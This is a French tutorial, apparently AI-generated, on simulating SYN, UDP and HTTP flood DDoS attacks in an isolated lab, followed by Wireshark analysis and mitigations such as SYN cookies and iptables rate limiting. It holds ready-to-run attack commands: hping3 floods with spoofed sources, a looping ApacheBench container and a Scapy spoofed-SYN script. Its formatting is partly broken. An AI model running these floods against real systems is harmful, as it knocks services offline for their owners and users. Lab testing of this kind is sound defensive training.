# Tutoriel : Simuler un DDoS en environnement sécurisé

## 🎯 Objectif  
Reproduire différents types d'attaques DDoS (SYN‑flood, UDP/HTTP flood) dans un lab isolé, analyser leur impact, et comprendre les contre-mesures.

## 🧠 Scénario émotionnel  
Vous gérez un service web et craignez un assaut automatisé. Vous devez tester votre infrastructure en environnement contrôlé pour anticiper et mitiger avant un vrai incident.

---

## 🛠️ Prérequis  
- Deux VM ou conteneurs Docker sur un réseau isolé (attacker + cible + sniff)  
- Système : Kali Linux (attacker) + Ubuntu/Nginx (victime)  
- Outils : `hping3`, `ab` (ApacheBench), `Wireshark`, `Scapy` ou Python  
- Réseau non accessible depuis Internet

---

## 🧩 Étape 1 – Préparer l’environnement

1. VM Attacker : Kali avec `sudo apt install hping3 apache2-utils`  
2. VM Cible : Ubuntu avec serveur `sudo apt install nginx`  
3. Sniffer : Wireshark ou `tcpdump -i eth0 -w ddos.pcap`

---

## 🧩 Étape 2 – Attaque SYN-flood avec hping3

```bash
sudo hping3 -S --flood --rand-source -p 80 <IP_CIBLE>

	•	-S : SYN-flood ; --flood : envoi continu ; --rand-source : fausse IP
Analysez avec htop, logs /var/log/nginx/access.log ou Wireshark  ￼ ￼ ￼

⸻

🧩 Étape 3 – Attaque UDP flood

sudo hping3 --udp --flood -p 80 <IP_CIBLE>

Simule une saturation UDP, à regarder via netstat -s pour erreurs ou surcharge

⸻

🧩 Étape 4 – Attaque HTTP flood simulée

Créez un conteneur Docker :

FROM alpine
RUN apk add apache2-utils
COPY attack.sh /attack.sh
CMD ["sh","/attack.sh"]

attack.sh :

#!/bin/sh
while true; do
  ab -n 1000 -c 50 http://<IP_CIBLE>/;
  sleep 1;
done

ab envoie des requêtes HTTP intensément → simulateur HTTP flood  ￼

⸻

🔍 Étape 5 – Capture & analyse avec Wireshark
	•	Filtre tcp.flags.syn==1 pour SYN floods
	•	VOIX UDP ou HTTP, latence, erreurs 503
	•	Volume et rafale des paquets ￼

⸻

🛡️ Étape 6 – Mitigation et défenses

Dans un shell cible :

# Activer SYN cookies
sudo sysctl -w net.ipv4.tcp_syncookies=1

# Limiter la taille des queues
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=128

# Rate limiting via iptables
sudo iptables -A INPUT -p tcp --syn -m limit --limit 10/s --limit-burst 20 -j ACCEPT

Testez à nouveau les attaques pour observer l’amélioration.

⸻

🧠 Étape 7 – Simulation d’un botnet Scapy (optionnel)

from scapy.all import send, IP, TCP
import random

for _ in range(10000):
    src = ".".join(str(random.randint(1,254)) for _ in range(4))
    pkt = IP(src=src, dst="<IP_CIBLE>")/TCP(dport=80, flags="S")
    send(pkt, verbose=False)

Émule un botnet simple sans surcharge, intéressant pour analyse comportementale  ￼ ￼

⸻

🧪 Quiz de consolidation
	1.	Quel flag TCP déclenche le flood SYN ?
	2.	Pourquoi utiliser --rand-source ?
	3.	Quels indicateurs de mitigation via sysctl surveiller ?
	4.	Comment reconnaître un HTTP flood dans les logs ?
	5.	Quel est le risque principal d’un test DDoS hors lab ?

⸻

✅ Cas d’usage
	•	Test de robustesse pour serveurs web afin d’éviter indisponibilité
	•	Validation de règles iptables, SYN cookies, rate-limiting
	•	Formation SOC : détection & réponse à une attaque DDoS en live

⸻

🔧 Extensions possibles
	•	Créer un botnet réparti via plusieurs conteneurs Docker
	•	Utiliser des scénarios red team avec outils comme LOIC/HULK  ￼ ￼ ￼ ￼ ￼ ￼
	•	Automatiser la simulation + collecte via scripts + alertes Slack
	•	Build un prototype de détection DDoS avec machine learning (ex. sur entropie/flot) ()

⸻

🎓 Résultat attendu
	•	Attaques SYN, UDP et HTTP simulées dans un environnement contrôlé
	•	Analyse et rapport des effets sur la cible (CPU, latence, logs)
	•	Implémentation efficace des contre-mesures réseau
	•	Base solide pour élaborer un véritable IDS/IPS anti-DDoS

---

### 📚 Sources principales  
- DDoS via hping3 (SYN/UDP floods)  [oai_citation:13‡GitHub](https://github.com/Indrajith-S/CEH-Lab-Notes/blob/master/9.%20Denial%20of%20Service/Perform%20a%20DoS%20Attack%20on%20a%20Target%20Host%20using%20hping3.md?utm_source=chatgpt.com)  
- HTTP flood via ApacheBench dans Docker  [oai_citation:14‡blogs.chiragganguli.com](https://blogs.chiragganguli.com/content/DDoS-Attack-Simulation-using-Docker?utm_source=chatgpt.com)  
- Guide Keysight pour simulation DDoS en labo  [oai_citation:15‡Keysight](https://www.keysight.com/us/en/assets/7019-0414/technical-overviews-archived/Simulating-a-DDoS-Attack-in-Your-Own-Lab.pdf?utm_source=chatgpt.com)  
- Botnet simulé en Python/Scapy  [oai_citation:16‡GitHub](https://github.com/eniac1546/Simple-DDOS-attack-Implementation?utm_source=chatgpt.com)

